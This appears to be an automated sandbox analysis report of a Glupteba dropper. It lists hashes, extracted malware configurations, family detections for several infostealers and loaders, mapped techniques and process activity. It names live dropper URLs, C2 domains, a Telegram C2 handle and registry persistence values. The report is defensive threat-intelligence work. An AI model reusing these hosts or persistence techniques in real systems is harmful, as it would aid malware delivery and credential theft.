glupteba | 8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa

Analysis

max time kernel
152s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 08:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe
Size

9.1MB
MD5

ad211b56d82623ec672fa937be2ab76a
SHA1

e4246779030fe133dbc213282a935ad24b8162c0
SHA256

8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa
SHA512

72d6680a6b91d3d0a99db8167510d77ec3324e90309aaac74ce956cf2943c1d5343f388e4c640a9345a1966d62d2c578e42077810524db5b9b79f195d00ec5a8

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

vidar

Version

39.9

Botnet

933

https://prophefliloc.tumblr.com/

Attributes

profile_id
933

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes

url4cnc
https://t.me/gishsunsetman

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4204-198-0x0000000000400000-0x0000000003097000-memory.dmp	family_glupteba
behavioral2/memory/4204-200-0x0000000005240000-0x0000000005B66000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4356 3204 rUNdlL32.eXe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	3204	rUNdlL32.eXe

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4212-205-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/4212-207-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/4212-208-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2000-224-0x0000000000170000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/2000-226-0x0000000000170000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/2000-242-0x0000000000170000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/2000-243-0x0000000000170000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/2000-253-0x0000000000170000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/4776-332-0x00000000000B0000-0x00000000002F5000-memory.dmp	family_redline
behavioral2/memory/4776-330-0x00000000000B0000-0x00000000002F5000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 4336 created 4204 4336 svchost.exe WerFault.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 4336 created 4204	4336	svchost.exe	WerFault.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2012-261-0x00000000005F0000-0x0000000000634000-memory.dmp	family_onlylogger
behavioral2/memory/2012-262-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3196-190-0x0000000002D90000-0x0000000002E2D000-memory.dmp	family_vidar
behavioral2/memory/3196-191-0x0000000000400000-0x0000000002CBE000-memory.dmp	family_vidar
behavioral2/memory/2752-276-0x0000000002160000-0x000000000220C000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 30 IoCs

Processes:

Files.exeKRSetp.exeInstall.exeFolder.exeInfo.exejfiag3g_gg.execleanpro22.exepub2.exejamesdirect.exeLitever01.exeComplete.exemd9_1sjm.exeFolder.exejfiag3g_gg.exejamesdirect.exeInfo.exeu4gfw0sBVYFHhY5DAjdCvnHN.exelNj0jGwyo9_tN37Pz3d4Z9UJ.exeyr_hm5gby5gpy7c7GLG_Anwm.exepTpSDv3NGGQZU6Md8zwJAh1s.exeMXD1z9v0pEKswXEHe4nqpPIu.exefceA53uYio4HPjgvfAJOpNRh.exerO8Pmpc__SDb1SlkPhzqKAHD.exeUHT_bSrezyW4_ylhYHfmRHsp.exe_HlXxNG5AQYndZwXllXrur0a.exeQc7KIcDfiYfydL5DSescCWOw.exejiwHQbRWik1NbgpsMMK_RPw4.exemqUS9pfmjpxD6tnMvCG8tmLR.exeWerFault.exemode.com

pid	process
1248	Files.exe
1936	KRSetp.exe
2148	Install.exe
4908	Folder.exe
4204	Info.exe
4744	jfiag3g_gg.exe
4824	cleanpro22.exe
1132	pub2.exe
2796	jamesdirect.exe
3196	Litever01.exe
2784	Complete.exe
3944	md9_1sjm.exe
3232	Folder.exe
492	jfiag3g_gg.exe
4212	jamesdirect.exe
256	Info.exe
3556	u4gfw0sBVYFHhY5DAjdCvnHN.exe
2752	lNj0jGwyo9_tN37Pz3d4Z9UJ.exe
3188	yr_hm5gby5gpy7c7GLG_Anwm.exe
1584	pTpSDv3NGGQZU6Md8zwJAh1s.exe
2000	MXD1z9v0pEKswXEHe4nqpPIu.exe
3708	fceA53uYio4HPjgvfAJOpNRh.exe
1100	rO8Pmpc__SDb1SlkPhzqKAHD.exe
2676	UHT_bSrezyW4_ylhYHfmRHsp.exe
2012	_HlXxNG5AQYndZwXllXrur0a.exe
2260	Qc7KIcDfiYfydL5DSescCWOw.exe
3852	jiwHQbRWik1NbgpsMMK_RPw4.exe
3576	mqUS9pfmjpxD6tnMvCG8tmLR.exe
5192	WerFault.exe
5820	mode.com

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\rO8Pmpc__SDb1SlkPhzqKAHD.exe	upx
C:\Users\Admin\Documents\rO8Pmpc__SDb1SlkPhzqKAHD.exe	upx
C:\Users\Admin\Documents\pTpSDv3NGGQZU6Md8zwJAh1s.exe	upx
C:\Users\Admin\Documents\pTpSDv3NGGQZU6Md8zwJAh1s.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/3944-163-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

yr_hm5gby5gpy7c7GLG_Anwm.exepTpSDv3NGGQZU6Md8zwJAh1s.exe8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exeFolder.exeComplete.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	yr_hm5gby5gpy7c7GLG_Anwm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	pTpSDv3NGGQZU6Md8zwJAh1s.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Complete.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

780 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
780	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

Looks up external IP address via web service 16 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
362	api.db-ip.com
398	ipinfo.io
214	ipinfo.io
236	ipinfo.io
355	ipinfo.io
360	api.db-ip.com
215	ipinfo.io
237	ipinfo.io
11	ipinfo.io
21	ipinfo.io
22	ipinfo.io
240	ipinfo.io
399	ipinfo.io
401	api.db-ip.com
5	ip-api.com
10	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

MXD1z9v0pEKswXEHe4nqpPIu.exe

pid process

2000 MXD1z9v0pEKswXEHe4nqpPIu.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

jamesdirect.exe

description pid process target process

PID 2796 set thread context of 4212 2796 jamesdirect.exe jamesdirect.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2000	MXD1z9v0pEKswXEHe4nqpPIu.exe

description	pid	process	target process
PID 2796 set thread context of 4212	2796	jamesdirect.exe	jamesdirect.exe

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1364	780	WerFault.exe	rundll32.exe
3652	4212	WerFault.exe	jamesdirect.exe
4820	4204	WerFault.exe	Info.exe
6492	6000	WerFault.exe	8RGwJeASNEQxag9mfYeJMpCm.exe
6480	3708	WerFault.exe	fceA53uYio4HPjgvfAJOpNRh.exe
6692	2260	WerFault.exe	Qc7KIcDfiYfydL5DSescCWOw.exe
6732	5820	WerFault.exe	AfBSXBRO7Qq5_st9NSDzoRb3.exe
6988	2012	WerFault.exe	_HlXxNG5AQYndZwXllXrur0a.exe
5480	7152	WerFault.exe	qbo9S0rwVvkkjyLq4zVfuzO5.exe
3580	3852	WerFault.exe	jiwHQbRWik1NbgpsMMK_RPw4.exe
6604	6000	WerFault.exe	8RGwJeASNEQxag9mfYeJMpCm.exe
7552	2012	WerFault.exe	_HlXxNG5AQYndZwXllXrur0a.exe
488	7152	WerFault.exe	qbo9S0rwVvkkjyLq4zVfuzO5.exe
4740	5476	WerFault.exe	aSmAY2dkSmq6kbEv_xNramvO.exe
5440	3852	WerFault.exe	jiwHQbRWik1NbgpsMMK_RPw4.exe
6004	2012	WerFault.exe	_HlXxNG5AQYndZwXllXrur0a.exe
5312	3020	WerFault.exe	svchost.exe
5192	2260	WerFault.exe	Qc7KIcDfiYfydL5DSescCWOw.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

7896 schtasks.exe
876 schtasks.exe
7176 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

6932 tasklist.exe
6504 tasklist.exe

pid	process
7896	schtasks.exe
876	schtasks.exe
7176	schtasks.exe

pid	process
6932	tasklist.exe
6504	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5100 taskkill.exe
7344 taskkill.exe
4044 taskkill.exe
Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

pid	process
5100	taskkill.exe
7344	taskkill.exe
4044	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Litever01.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Litever01.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Litever01.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2208 PING.EXE
7932 PING.EXE

pid	process
2208	PING.EXE
7932	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exepub2.exemsedge.exejfiag3g_gg.exe

pid	process
4644	msedge.exe
4644	msedge.exe
1132	pub2.exe
1132	pub2.exe
3272	msedge.exe
3272	msedge.exe
492	jfiag3g_gg.exe
492	jfiag3g_gg.exe
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8
8

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1132 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

3272 msedge.exe
3272 msedge.exe
3272 msedge.exe
3272 msedge.exe

pid	process
1132	pub2.exe

pid	process
3272	msedge.exe
3272	msedge.exe
3272	msedge.exe
3272	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeKRSetp.exetaskkill.exemd9_1sjm.exejamesdirect.exeWerFault.exesvchost.exe

description	pid	process
Token: SeCreateTokenPrivilege	2148	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2148	Install.exe
Token: SeLockMemoryPrivilege	2148	Install.exe
Token: SeIncreaseQuotaPrivilege	2148	Install.exe
Token: SeMachineAccountPrivilege	2148	Install.exe
Token: SeTcbPrivilege	2148	Install.exe
Token: SeSecurityPrivilege	2148	Install.exe
Token: SeTakeOwnershipPrivilege	2148	Install.exe
Token: SeLoadDriverPrivilege	2148	Install.exe
Token: SeSystemProfilePrivilege	2148	Install.exe
Token: SeSystemtimePrivilege	2148	Install.exe
Token: SeProfSingleProcessPrivilege	2148	Install.exe
Token: SeIncBasePriorityPrivilege	2148	Install.exe
Token: SeCreatePagefilePrivilege	2148	Install.exe
Token: SeCreatePermanentPrivilege	2148	Install.exe
Token: SeBackupPrivilege	2148	Install.exe
Token: SeRestorePrivilege	2148	Install.exe
Token: SeShutdownPrivilege	2148	Install.exe
Token: SeDebugPrivilege	2148	Install.exe
Token: SeAuditPrivilege	2148	Install.exe
Token: SeSystemEnvironmentPrivilege	2148	Install.exe
Token: SeChangeNotifyPrivilege	2148	Install.exe
Token: SeRemoteShutdownPrivilege	2148	Install.exe
Token: SeUndockPrivilege	2148	Install.exe
Token: SeSyncAgentPrivilege	2148	Install.exe
Token: SeEnableDelegationPrivilege	2148	Install.exe
Token: SeManageVolumePrivilege	2148	Install.exe
Token: SeImpersonatePrivilege	2148	Install.exe
Token: SeCreateGlobalPrivilege	2148	Install.exe
Token: 31	2148	Install.exe
Token: 32	2148	Install.exe
Token: 33	2148	Install.exe
Token: 34	2148	Install.exe
Token: 35	2148	Install.exe
Token: SeDebugPrivilege	1936	KRSetp.exe
Token: SeDebugPrivilege	5100	taskkill.exe
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeManageVolumePrivilege	3944	md9_1sjm.exe
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeDebugPrivilege	2796	jamesdirect.exe
Token: SeDebugPrivilege	4204	WerFault.exe
Token: SeImpersonatePrivilege	4204	WerFault.exe
Token: SeTcbPrivilege	4336	svchost.exe
Token: SeTcbPrivilege	4336	svchost.exe
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeManageVolumePrivilege	3944	md9_1sjm.exe
Token: SeManageVolumePrivilege	3944	md9_1sjm.exe
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8
Token: SeShutdownPrivilege	8
Token: SeCreatePagefilePrivilege	8

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

3272 msedge.exe
3272 msedge.exe
3272 msedge.exe

pid	process
3272	msedge.exe
3272	msedge.exe
3272	msedge.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

cleanpro22.exeComplete.exeMXD1z9v0pEKswXEHe4nqpPIu.exeyr_hm5gby5gpy7c7GLG_Anwm.exelNj0jGwyo9_tN37Pz3d4Z9UJ.exepTpSDv3NGGQZU6Md8zwJAh1s.exeUHT_bSrezyW4_ylhYHfmRHsp.exeQc7KIcDfiYfydL5DSescCWOw.exemqUS9pfmjpxD6tnMvCG8tmLR.exe_HlXxNG5AQYndZwXllXrur0a.exejiwHQbRWik1NbgpsMMK_RPw4.exefceA53uYio4HPjgvfAJOpNRh.exe

pid	process
4824	cleanpro22.exe
2784	Complete.exe
2000	MXD1z9v0pEKswXEHe4nqpPIu.exe
3188	yr_hm5gby5gpy7c7GLG_Anwm.exe
2752	lNj0jGwyo9_tN37Pz3d4Z9UJ.exe
1584	pTpSDv3NGGQZU6Md8zwJAh1s.exe
2676	UHT_bSrezyW4_ylhYHfmRHsp.exe
2260	Qc7KIcDfiYfydL5DSescCWOw.exe
1584	pTpSDv3NGGQZU6Md8zwJAh1s.exe
3576	mqUS9pfmjpxD6tnMvCG8tmLR.exe
2012	_HlXxNG5AQYndZwXllXrur0a.exe
3852	jiwHQbRWik1NbgpsMMK_RPw4.exe
3708	fceA53uYio4HPjgvfAJOpNRh.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exeFiles.exemsedge.exeFolder.exeInstall.exe

description	pid	process	target process
PID 636 wrote to memory of 1248	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Files.exe
PID 636 wrote to memory of 1248	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Files.exe
PID 636 wrote to memory of 1248	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Files.exe
PID 636 wrote to memory of 1936	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	KRSetp.exe
PID 636 wrote to memory of 1936	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	KRSetp.exe
PID 636 wrote to memory of 2148	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Install.exe
PID 636 wrote to memory of 2148	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Install.exe
PID 636 wrote to memory of 2148	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Install.exe
PID 636 wrote to memory of 3272	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	msedge.exe
PID 636 wrote to memory of 3272	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	msedge.exe
PID 636 wrote to memory of 4908	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Folder.exe
PID 636 wrote to memory of 4908	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Folder.exe
PID 636 wrote to memory of 4908	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Folder.exe
PID 636 wrote to memory of 4204	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Info.exe
PID 636 wrote to memory of 4204	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Info.exe
PID 636 wrote to memory of 4204	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Info.exe
PID 1248 wrote to memory of 4744	1248	Files.exe	jfiag3g_gg.exe
PID 1248 wrote to memory of 4744	1248	Files.exe	jfiag3g_gg.exe
PID 1248 wrote to memory of 4744	1248	Files.exe	jfiag3g_gg.exe
PID 3272 wrote to memory of 4700	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 4700	3272	msedge.exe	msedge.exe
PID 636 wrote to memory of 4824	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	cleanpro22.exe
PID 636 wrote to memory of 4824	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	cleanpro22.exe
PID 636 wrote to memory of 4824	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	cleanpro22.exe
PID 636 wrote to memory of 1132	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	pub2.exe
